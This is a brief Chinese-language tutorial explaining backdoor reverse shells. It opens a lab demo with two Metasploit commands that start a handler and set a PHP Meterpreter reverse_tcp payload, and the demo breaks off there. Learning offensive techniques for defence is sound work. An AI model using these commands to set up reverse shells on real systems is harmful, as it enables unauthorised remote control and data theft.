说明:
本章内容,仅供学习,不要用于非法用途(做个好白帽)
(一)后门反弹是什么
后门反弹是指攻击者在成功入侵一台计算机后,在目标计算机上安装一个“后门程序”,将该程序与反向Shell连接在一起。这种“后门程序”通常是一个被精心编写的脚本、软件工具或操作系统的恶意修改版本,它会在被攻击的计算机上隐藏起来,并开辟一个特殊的端口以便远程控制攻击者的Shell来操纵计算机。
当攻击者使用后门程序进行攻击时,它会向预定义的攻击者主机发起连接,允许攻击者通过反向Shell和目标计算机进行远程连接。这样,攻击者就能够利用这个“后门程序”,在经过登录验证的情况下轻松地远程控制目标计算机。在许多情况下,攻击者通过这种方式来执行各种恶意操作,包括修改或操纵系统文件、查看、篡改、窃取用户敏感信息等。
(二)实验演示
1、使用监控模块-handler
use exploit/multi/handler
2、配置攻击负载设置payload
设置php的攻击负载payload:
命令:set payload php/meterpreter/reverse_tcp